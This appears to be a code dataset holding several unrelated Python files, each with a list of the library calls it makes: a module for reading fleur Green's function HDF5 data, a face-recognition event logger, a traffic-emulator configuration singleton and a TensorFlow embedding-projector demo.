:param index: integer index of the element to read in (indexing starts at 1)
:returns: tuple of the information containing the :py:class:`GreensfElement` for the element
and the datasets and attributes dict produced by the corresponding
:py:class:`~masci_tools.io.parsers.hdf5.HDF5Reader`
"""
with HDF5Reader(file) as h5reader:
gf_element = _read_element_header(h5reader._h5_file, index)
group_name = _get_greensf_group_name(h5reader._h5_file)
if gf_element.sphavg:
recipe = _get_sphavg_recipe(group_name, index, gf_element.contour)
else:
recipe = _get_radial_recipe(group_name, index, gf_element.contour)
data, attributes = h5reader.read(recipe=recipe)
return gf_element, data, attributes
class GreensFunction:
"""
Class for working with Green's functions calculated by the fleur code
:param element: :py:class:`GreensfElement` namedtuple containing the information about the element
:param data: datasets dict produced by one of the hdf recipes for reading Green's functions
:param attributes: attributes dict produced by one of the hdf recipes for reading Green's functions
"""
def __init__(self, element, data, attributes):
self.element = element
self.points = data.pop('energy_points')
self.weights = data.pop('energy_weights')
self.data = data
if not self.sphavg:
self.scalar_products = attributes['scalarProducts']
self.radial_functions = attributes['radialFunctions']
raise NotImplementedError("Radial Green's functions not yet implemented")
self.spins = attributes['spins']
self.mperp = attributes['mperp']
self.lmax = attributes['lmax']
@classmethod
def fromFile(cls, file, index):
"""
Classmethod for creating a :py:class:`GreensFunction` instance directly from a hdf file
:param file: path or opened file handle to a greensf.hdf file
:param index: int index of the element to read in
"""
element, data, attributes = _read_gf_element(file, index)
return cls(element, data, attributes)
def __getattr__(self, attr):
"""
This __getattr__ method redirects lookups of field names of the stored :py:class:`GreensfElement`
to return the value from the namedtuple
:param attr: attribute to look up
:returns: value of the attribute if it is a field name of :py:class:`GreensfElement`
"""
if attr in GreensfElement._fields:
return self.element._asdict()[attr]
raise AttributeError(f'{self.__class__.__name__!r} object has no attribute {attr!r}')
@staticmethod
def to_m_index(m):
"""
Convert between magnetic quantum numbers between -l and l
to 0 and 2l+1 for easier indexing
:param m: int magnetic quantum number to convert
:returns: converted magnetic quantum number
"""
if abs(m) > 3:
raise ValueError('Invalid magnetic quantum number (>3)')
return m + 3
@staticmethod
def to_spin_indices(spin):
"""
Convert between spin index (0 to 3) to the corresponding
two spin indices (0 or 1)
:param spin: int spin index to convert
:returns: tuple of spin indices
"""
if spin < 0 or spin > 3:
raise ValueError('Invalid spin index')
if spin < 2:
spin1 = spin
spin2 = spin
elif spin == 2:
spin1 = 1
spin2 = 0
else:
spin1 = 0
spin2 = 1
return spin1, spin2
@property
def nspins(self):
"""
Return the number of spins of the current element.
If mperp is True for the element it is 4 otherwise it
is determined by the spins attribute
"""
if self.mperp:
return 4
else:
return self.spins
def get_scalar_product_by_key(self, key, spin):
spin1, spin2 = self.to_spin_indices(spin)
return self.scalar_products[f'{key}n'][spin1, spin2]
def __str__(self):
"""
String representation of the :py:class:`GreensFunction`. Chosen to be the
str representation of the stored :py:class:`GreensfElement` instance.
"""
return str(self.element)
def energy_dependence(self, *, m=None, mp=None, spin, imag=True, both_contours=False):
"""
Select data with energy dependence
:param m: optional integer magnetic quantum number between -l and l
:param mp: optional integer magnetic quantum number between -lp and lp
:param spin: optional integer spin between 1 and nspins
:param both_contours: bool if True the data is not added for both energy contours
:param imag: bool if True and both_contours is False the imaginary part 1/2i(G(z)-G(z^*)) is returned
otherwise the real part 1/2(G(z)+G(z^*))
:returns: numpy array with the selected data
"""
if spin is not None:
spin -= 1
spin_index = min(spin, 2 if self.mperp else self.nspins - 1)
else:
spin_index = slice(0, min(3, self.nspins))
if m is not None:
m_index = self.to_m_index(m)
else:
m_index = slice(self.lmax - self.l, self.lmax + self.l + 1, 1)
if mp is not None:
mp_index = self.to_m_index(mp)
else:
mp_index = slice(self.lmax - self.lp, self.lmax + self.lp + 1, 1)
gf = self.data['sphavg'][:, spin_index, mp_index, m_index, :].T
if both_contours:
return gf
else:
if imag:
data = -1 / (2 * np.pi * 1j) * (gf[..., 0] - gf[..., 1])
else:
data = -1 / (2 * np.pi) * (gf[..., 0] + gf[..., 1])
return data.real
def trace_energy_dependence(self, spin, imag=True):
"""
Select trace of data with energy dependence
:param spin: integer spin between 1 and nspins
:param imag: bool if True the imaginary part 1/2i(G(z)-G(z^*)) is returned
otherwise the real part 1/2(G(z)+G(z^*))
:returns: numpy array with the selected and traced over data
"""
if self.l != self.lp:
raise ValueError('Trace only supported for l==lp')
data = np.zeros(self.points.shape)
for m in range(-self.l, self.l + 1):
data += self.energy_dependence(m=m, mp=m, spin=spin, imag=imag)
return data
class colors:
"""
Color strings for coloring terminal output
You may need to change color settings in iPython
"""
red = '\033[31m'
endc = '\033[m'
green = '\033[32m'
def printElements(elements, index=None, mark=None):
"""
Print the given list of :py:class:`GreensfElement` in a nice table
:param elements: list of :py:class:`GreensfElement` to be printed
:param index: optional list of indices to show instead of the default index in the list
:param mark: optional list of int with elements to emphasize with an arrow and color
"""
print('Index | l | lp | atom | atomp | sphavg | onsite | iContour | atomDiff |')
print('-----------------------------------------------------------------------------------------')
if index is None:
elem_iter = enumerate(elements)
else:
elem_iter = zip(index, elements)
for elem_index, element in elem_iter:
if mark is not None and elem_index + 1 in mark:
markStr = '<---'
color = colors.green
else:
markStr = ''
color = ''
atomdiff_str = np.array2string(element.atomDiff,
precision=2,
separator=',',
suppress_small=True,
sign=' ',
floatmode='fixed')
print(
color +
f'{elem_index+1:<7d}|{element.l:7d}|{element.lp:7d}|{element.atomType:7d}|{element.atomTypep:7d}|{str(element.sphavg):>8s}|{str(element.onsite):>8s}|{element.contour:10d}|{atomdiff_str}|{markStr}'
+ colors.endc)
def listElements(hdffile, show=False):
"""
Find the Green's function elements contained in the given ``greensf.hdf`` file
:param hdffile: filepath or file handle to a greensf.hdf file
:param show: bool if True the found elements are printed in a table
:returns: list of :py:class:`GreensfElement`
"""
with h5py.File(hdffile, 'r') as h5_file:
group_name = _get_greensf_group_name(h5_file)
num_elements = h5_file.get(group_name).attrs['NumElements'][0]
elements = []
for index in range(1, num_elements + 1):
elements.append(_read_element_header(h5_file, index))
if show:
print(f'These Elements are found in {hdffile}:')
printElements(elements)
return elements
def selectOnsite(hdffile, l, atomType, lp=None, show=True):
"""
Find the specified onsite element in the ``greensf.hdf`` file
:param hdffile: filepath or file handle to a greensf.hdf file
:param l: integer of the orbital quantum number
:param atomType: integer of the atom type
:param lp: optional integer of the second orbital quantum number (default equal to l)
:param show: bool if True the found elements are printed in a table and the selected ones are marked
:returns: list of indexes in the ``greensf.hdf`` file corresponding to the selected criteria
"""
if lp is None:
lp = l
elements = listElements(hdffile)
foundIndices = []
for index, elem in enumerate(elements):
if elem.l != l:
continue
if elem.lp != lp:
continue
if elem.atomType != atomType:
continue
if elem.atomTypep != atomType:
continue
if np.linalg.norm(elem.atomDiff) > 1e-12:
continue
foundIndices.append(index + 1)
if show:
printElements(elements, mark=foundIndices)
return foundIndices
def intersite_shells(hdffile, refAtom, return_greensf=True, show=False):
"""
Construct the green's function pairs to calculate the Jij exchange constants
for a given reference atom from a given ``greensf.hdf`` file
:param hdffile: filepath or file handle to a greensf.hdf file
:param refAtom: integer of the atom to calculate the Jij's for (corresponds to the i)
:param return_greensf: bool, if True, instead of the indices, an iterator yielding the
green's functions directly for calculations is returned
:param show: if True the elements belonging to each shell are printed in a table
:returns: either list of tuples with distance and all indices of pairs in the shell
or flat iterator with distance and the two corresponding :py:class:`GreensFunction`
instances
"""
elements = listElements(hdffile)
distances = [round(np.linalg.norm(elem.atomDiff), 12) for elem in elements]
#sort the elements according to shells
index_sorted = sorted(range(len(elements)), key=lambda k: distances[k])
elements_sorted = [elements[index] for index in index_sorted]
jijPairs = []
for dist, shell in groupby(zip(index_sorted, elements_sorted), key=lambda k: distances[k[0]]):
if dist > 1e-12:
if show:
print(f'\nFound shell at distance: {dist}')
print('The following elements are present:')
shell_list = list(shell)
jijPairsShell = []
#Try to find gij gji pairs for Jij calculations
for indexij, elemij in shell_list:
for indexji, elemji in shell_list:
if elemij.contour != elemji.contour:
continue
if elemij.atomType != refAtom:
continue
if elemij.atomType != elemji.atomTypep:
continue
if elemij.atomTypep != elemji.atomType:
continue
if elemij.l != elemji.l:
continue
if elemij.lp != elemji.lp:
continue
if np.linalg.norm(elemij.atomDiff + elemji.atomDiff) > 1e-12:
continue
#here we have found a pair
#Plus 1 because the indexing starts at 1 in the hdf file
if (indexji + 1, indexij + 1) not in jijPairsShell or \
elemij.atomType == elemij.atomTypep:
jijPairsShell.append((indexij + 1, indexji + 1))
if len(jijPairsShell) > 0:
jijPairs.append((dist, jijPairsShell))
if show:
#print the elements in the shell
elem = [x[1] for x in shell_list]
index = [x[0] for x in shell_list]
printElements(elem, index=index)
def shell_iterator(shells):
for distance, pairs in shells:
for g1, g2 in pairs:
yield (distance,
GreensFunction.fromFile(hdffile, g1),\
GreensFunction.fromFile(hdffile, g2))
if return_greensf:
return shell_iterator(jijPairs)
else:
return jijPairs
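# A minimal usage sketch (an assumption, not part of the original module), based
# on the public helpers above; 'greensf.hdf' is a placeholder path and the l,
# atomType and spin values are only examples:
#
#     elements = listElements('greensf.hdf', show=True)
#     onsite = selectOnsite('greensf.hdf', l=2, atomType=1)
#     gf = GreensFunction.fromFile('greensf.hdf', index=onsite[0])
#     spectral = gf.trace_energy_dependence(spin=1)  # imaginary part, traced over m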
|
[
"masci_tools.io.parsers.hdf5.reader.AttribTransformation",
"h5py.File",
"masci_tools.io.parsers.hdf5.HDF5Reader",
"masci_tools.io.parsers.hdf5.reader.Transformation",
"numpy.array2string",
"numpy.zeros",
"numpy.array",
"collections.namedtuple",
"numpy.linalg.norm"
] |
[((1342, 1462), 'collections.namedtuple', 'namedtuple', (['"""GreensfElement"""', "['l', 'lp', 'atomType', 'atomTypep', 'sphavg', 'onsite', 'contour', 'nLO',\n 'atomDiff']"], {}), "('GreensfElement', ['l', 'lp', 'atomType', 'atomTypep', 'sphavg',\n 'onsite', 'contour', 'nLO', 'atomDiff'])\n", (1352, 1462), False, 'from collections import namedtuple\n'), ((7957, 7992), 'numpy.array', 'np.array', (["element.attrs['atomDiff']"], {}), "(element.attrs['atomDiff'])\n", (7965, 7992), True, 'import numpy as np\n'), ((8704, 8720), 'masci_tools.io.parsers.hdf5.HDF5Reader', 'HDF5Reader', (['file'], {}), '(file)\n', (8714, 8720), False, 'from masci_tools.io.parsers.hdf5 import HDF5Reader\n'), ((14880, 14907), 'numpy.zeros', 'np.zeros', (['self.points.shape'], {}), '(self.points.shape)\n', (14888, 14907), True, 'import numpy as np\n'), ((16206, 16321), 'numpy.array2string', 'np.array2string', (['element.atomDiff'], {'precision': '(2)', 'separator': '""","""', 'suppress_small': '(True)', 'sign': '""" """', 'floatmode': '"""fixed"""'}), "(element.atomDiff, precision=2, separator=',',\n suppress_small=True, sign=' ', floatmode='fixed')\n", (16221, 16321), True, 'import numpy as np\n'), ((17121, 17144), 'h5py.File', 'h5py.File', (['hdffile', '"""r"""'], {}), "(hdffile, 'r')\n", (17130, 17144), False, 'import h5py\n'), ((5976, 6092), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_all_child_datasets"""', 'args': '()', 'kwargs': "{'ignore': ['scalarProducts', 'LOContribution']}"}), "(name='get_all_child_datasets', args=(), kwargs={'ignore': [\n 'scalarProducts', 'LOContribution']})\n", (5990, 6092), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6155, 6222), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (6169, 6222), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6236, 6310), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(1.0 / HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})\n", (6250, 6310), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6502, 6567), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_all_child_datasets"""', 'args': '()', 'kwargs': '{}'}), "(name='get_all_child_datasets', args=(), kwargs={})\n", (6516, 6567), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6685, 6750), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_all_child_datasets"""', 'args': '()', 'kwargs': '{}'}), "(name='get_all_child_datasets', args=(), kwargs={})\n", (6699, 6750), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((18509, 18538), 'numpy.linalg.norm', 'np.linalg.norm', (['elem.atomDiff'], {}), '(elem.atomDiff)\n', (18523, 18538), True, 'import numpy as np\n'), ((19603, 19632), 'numpy.linalg.norm', 'np.linalg.norm', (['elem.atomDiff'], {}), '(elem.atomDiff)\n', (19617, 19632), True, 'import numpy as np\n'), ((2201, 2268), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 
'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (2215, 2268), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((2290, 2364), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(1.0 / HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})\n", (2304, 2364), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((2575, 2642), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (2589, 2642), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((2664, 2779), 'masci_tools.io.parsers.hdf5.reader.AttribTransformation', 'AttribTransformation', ([], {'name': '"""shift_by_attribute"""', 'attrib_name': '"""fermi_energy"""', 'args': '()', 'kwargs': "{'negative': True}"}), "(name='shift_by_attribute', attrib_name='fermi_energy',\n args=(), kwargs={'negative': True})\n", (2684, 2779), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3009, 3077), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})\n", (3023, 3077), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3294, 3361), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (3308, 3361), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3383, 3451), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})\n", (3397, 3451), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3732, 3802), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('FermiEnergy',)", 'kwargs': '{}'}), "(name='get_attribute', args=('FermiEnergy',), kwargs={})\n", (3746, 3802), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3824, 3884), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (3838, 3884), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4113, 4177), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('spins',)", 'kwargs': '{}'}), "(name='get_attribute', args=('spins',), kwargs={})\n", (4127, 4177), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4199, 4259), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (4213, 4259), False, 'from 
masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4526, 4590), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('mperp',)", 'kwargs': '{}'}), "(name='get_attribute', args=('mperp',), kwargs={})\n", (4540, 4590), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4612, 4672), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (4626, 4672), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4694, 4766), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""apply_lambda"""', 'args': '(lambda x: x == 1,)', 'kwargs': '{}'}), "(name='apply_lambda', args=(lambda x: x == 1,), kwargs={})\n", (4708, 4766), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((5037, 5100), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('maxl',)", 'kwargs': '{}'}), "(name='get_attribute', args=('maxl',), kwargs={})\n", (5051, 5100), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((5122, 5182), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (5136, 5182), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((20898, 20947), 'numpy.linalg.norm', 'np.linalg.norm', (['(elemij.atomDiff + elemji.atomDiff)'], {}), '(elemij.atomDiff + elemji.atomDiff)\n', (20912, 20947), True, 'import numpy as np\n')]
|
# logging times and names to a file for event parsing
import os
import time
from pathlib import Path
import csv
logPath = os.path.join(os.getcwd(), "face-log.txt")
FIELD_AMT = 2
class Logger(object):
# initialization function that creates the log file
def __init__(self):
path = Path(logPath)
if path.is_file():
print("Found previous log file")
file = open(logPath, "r")
first_line = file.readline()
if first_line is None or first_line == "":
print("[1] File is empty")
logFile = open(logPath, "w")
logFile.write("Event Time\tIdentity\n")
else:
# checking if the header is correct
logFile = open(logPath, "r")
reader = csv.reader(logFile, delimiter='\t')
row = next(reader)
if len(row) > 1:
if row[0] == "Event Time" and row[1] == "Identity":
print("File correctly formatted")
else:
print("[1] File has an incorrectly formatted first line")
print("Please fix the headers and run again")
else:
print("[2] File has an incorrectly formatted first line")
print("Please fix the headers and run again")
# TODO: check if the data within the file is formatted correctly w/ FIELD_AMT
# TODO: clean incorrectly formatted data
else:
print("No previous log file detected!")
print("Creating new log file")
# create new file w/ header
logFile = open(logPath, "w")
logFile.write("Event Time\tIdentity\n")
logFile.close()
def addLog(self, name, time):
if time is None or name is None:
print("[ERROR] no name or time to add to log file!")
else:
logFile = open(logPath, "a")
logFile.write(time + "\t" + name + "\n")
logFile.close()
print("Added log")
# parses through the log and returns time when person was last seen
def checkLastSeen(self, name):
logFile = open(logPath, "r")
reader = csv.reader(logFile, delimiter='\t')
lastSeen = ""
for rows in reader:
if rows[1] == name:
lastSeen = rows[0]
logFile.close()
return lastSeen
# testing our new logger
logger = Logger()
now = str(int(time.time()))  # avoid shadowing the time module
logger.addLog("blake_edwards", now)
print("blake_edwards last seen @: " + logger.checkLastSeen("blake_edwards"))
|
[
"os.getcwd",
"pathlib.Path",
"csv.reader",
"time.time"
] |
[((135, 146), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (144, 146), False, 'import os\n'), ((296, 309), 'pathlib.Path', 'Path', (['logPath'], {}), '(logPath)\n', (300, 309), False, 'from pathlib import Path\n'), ((2289, 2324), 'csv.reader', 'csv.reader', (['logFile'], {'delimiter': '"""\t"""'}), "(logFile, delimiter='\\t')\n", (2299, 2324), False, 'import csv\n'), ((2549, 2560), 'time.time', 'time.time', ([], {}), '()\n', (2558, 2560), False, 'import time\n'), ((800, 835), 'csv.reader', 'csv.reader', (['logFile'], {'delimiter': '"""\t"""'}), "(logFile, delimiter='\\t')\n", (810, 835), False, 'import csv\n')]
|
#**********************************************************************************************
# Traffic Emulator for Network Services
# Copyright 2020 VMware, Inc
# The BSD-2 license (the "License") set forth below applies to all parts of
# the Traffic Emulator for Network Services project. You may not use this file
# except in compliance with the License.
#
# BSD-2 License
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE
#**********************************************************************************************
from collections import defaultdict
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class TE(object):
__metaclass__ = Singleton
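    # NOTE: the __metaclass__ attribute is only honoured on Python 2; on
    # Python 3 the singleton would have to be declared as `class TE(metaclass=Singleton)`.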
def __init__(self, daemon_ip, flask_port, redis_port, nginx_port, \
postgres_port, zmq_port, grafana_port, loglevel):
self.__daemon_ip = daemon_ip
self.__flask_port = flask_port
self.__nginx_port = nginx_port
self.__redis_port = redis_port
self.__postgres_port = postgres_port
self.__zmq_port = zmq_port
self.__grafana_port = grafana_port
self.__loglevel = loglevel
self.__te_dp_dict = {}
self.__resource_config = None
self.__session_config = None
self.__instance_profile_config = None
self.__client_cert_bundle = None
#Stats Collection Purpose
self.ses_time_stamps = defaultdict(list)
def add_ses_time_stamp(self, ses_tag, timestamp):
self.ses_time_stamps[ses_tag].append(timestamp)
def clear_ses_time_stamp(self):
self.ses_time_stamps.clear()
def get_daemon_ip(self):
return self.__daemon_ip
def get_flask_port(self):
return self.__flask_port
def get_nginx_port(self):
return self.__nginx_port
def get_redis_port(self):
return self.__redis_port
def get_postgres_port(self):
return self.__postgres_port
def get_zmq_port(self):
return self.__zmq_port
def get_grafana_port(self):
return self.__grafana_port
def get_loglevel(self):
return self.__loglevel
def set_te_dp(self, te_dp_dict):
self.__te_dp_dict = te_dp_dict
def unset_te_dp(self):
self.__te_dp_dict = {}
def get_te_dp(self):
return self.__te_dp_dict
def set_resource_config(self, resource_config):
self.__resource_config = resource_config
def unset_resource_config(self):
self.__resource_config = None
def get_resource_config(self):
return self.__resource_config
def set_session_config(self, session_config):
self.__session_config = session_config
def unset_session_config(self):
self.__session_config = None
def get_session_config(self):
return self.__session_config
def set_instance_profile_config(self, instance_profile_config):
self.__instance_profile_config = instance_profile_config
def unset_instance_profile_config(self):
self.__instance_profile_config = None
def get_instance_profile_config(self):
return self.__instance_profile_config
def set_client_cert_bundle(self, client_cert_bundle):
self.__client_cert_bundle = client_cert_bundle
def unset_client_cert_bundle(self):
self.__client_cert_bundle = None
def get_client_cert_bundle(self):
return self.__client_cert_bundle
|
[
"collections.defaultdict"
] |
[((2909, 2926), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (2920, 2926), False, 'from collections import defaultdict\n')]
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf # Requires Tensorflow >=2.1
from tensorboard.plugins import projector
import tensorflow_datasets as tfds
# This demo expands upon the word embeddings tutorial found
# here: https://www.tensorflow.org/tutorials/text/word_embeddings)
# and is intended to demonstrate the use of the embedding projector.
LOG_DIR = os.getenv("LOGDIR") or "/tmp/projector_demo" # Tensorboard log dir
METADATA_FNAME = "meta.tsv" # Labels will be stored here
STEP = 0
# Load imdb reviews dataset
(train_data, test_data), info = tfds.load(
"imdb_reviews/subwords8k",
split=(tfds.Split.TRAIN, tfds.Split.TEST),
with_info=True,
as_supervised=True,
)
encoder = info.features["text"].encoder
# shuffle, pad, and train the data.
train_batches = train_data.shuffle(1000).padded_batch(10, padded_shapes=((None,), ()))
test_batches = test_data.shuffle(1000).padded_batch(10, padded_shapes=((None,), ()))
train_batch, train_labels = next(iter(train_batches))
embedding_dim = 16
# Create a basic embedding layer
embedding = tf.keras.layers.Embedding(encoder.vocab_size, embedding_dim)
model = tf.keras.Sequential(
[
embedding,
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1),
]
)
# Compile model
model.compile(
optimizer="adam",
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=["accuracy"],
)
# Train model
history = model.fit(
train_batches, epochs=1, validation_data=test_batches, validation_steps=20
)
# Fetch the embedding layer and get the weights.
# Make sure to remove the first element, as it is padding.
weights = tf.Variable(model.layers[0].get_weights()[0][1:])
def register_embedding(weights, labels, log_dir) -> None:
"""Saves a metadata file (labels) and a checkpoint (derived from weights)
and configures the Embedding Projector to read from the appropriate locations.
Args:
weights: tf.Variable with the weights of the embedding layer to be displayed.
labels: list of labels corresponding to the weights.
      log_dir: Directory into which to store the config file, as a `str`.
"""
# Create a checkpoint from embedding, the filename and key are
# name of the tensor.
checkpoint = tf.train.Checkpoint(embedding=weights)
    checkpoint.save(os.path.join(log_dir, "embedding.ckpt"))
# Save Labels separately on a line-by-line manner.
with open(os.path.join(log_dir, METADATA_FNAME), "w") as f:
for label in labels:
f.write("{}\n".format(label))
# Set up config
config = projector.ProjectorConfig()
embedding = config.embeddings.add()
# The name of the tensor will be suffixed by `/.ATTRIBUTES/VARIABLE_VALUE`
embedding.tensor_name = "embedding/.ATTRIBUTES/VARIABLE_VALUE"
embedding.metadata_path = METADATA_FNAME
projector.visualize_embeddings(log_dir, config)
# Save Files
register_embedding(weights, encoder.subwords, LOG_DIR)
|
[
"tensorboard.plugins.projector.visualize_embeddings",
"tensorflow_datasets.load",
"tensorflow.train.Checkpoint",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.losses.BinaryCrossentropy",
"tensorboard.plugins.projector.ProjectorConfig",
"tensorflow.keras.layers.GlobalAveragePooling1D",
"tensorflow.keras.layers.Embedding",
"os.path.join",
"os.getenv"
] |
[((1344, 1464), 'tensorflow_datasets.load', 'tfds.load', (['"""imdb_reviews/subwords8k"""'], {'split': '(tfds.Split.TRAIN, tfds.Split.TEST)', 'with_info': '(True)', 'as_supervised': '(True)'}), "('imdb_reviews/subwords8k', split=(tfds.Split.TRAIN, tfds.Split.\n TEST), with_info=True, as_supervised=True)\n", (1353, 1464), True, 'import tensorflow_datasets as tfds\n'), ((1847, 1907), 'tensorflow.keras.layers.Embedding', 'tf.keras.layers.Embedding', (['encoder.vocab_size', 'embedding_dim'], {}), '(encoder.vocab_size, embedding_dim)\n', (1872, 1907), True, 'import tensorflow as tf\n'), ((1148, 1167), 'os.getenv', 'os.getenv', (['"""LOGDIR"""'], {}), "('LOGDIR')\n", (1157, 1167), False, 'import os\n'), ((3106, 3144), 'tensorflow.train.Checkpoint', 'tf.train.Checkpoint', ([], {'embedding': 'weights'}), '(embedding=weights)\n', (3125, 3144), True, 'import tensorflow as tf\n'), ((3431, 3458), 'tensorboard.plugins.projector.ProjectorConfig', 'projector.ProjectorConfig', ([], {}), '()\n', (3456, 3458), False, 'from tensorboard.plugins import projector\n'), ((3694, 3741), 'tensorboard.plugins.projector.visualize_embeddings', 'projector.visualize_embeddings', (['log_dir', 'config'], {}), '(log_dir, config)\n', (3724, 3741), False, 'from tensorboard.plugins import projector\n'), ((1970, 2010), 'tensorflow.keras.layers.GlobalAveragePooling1D', 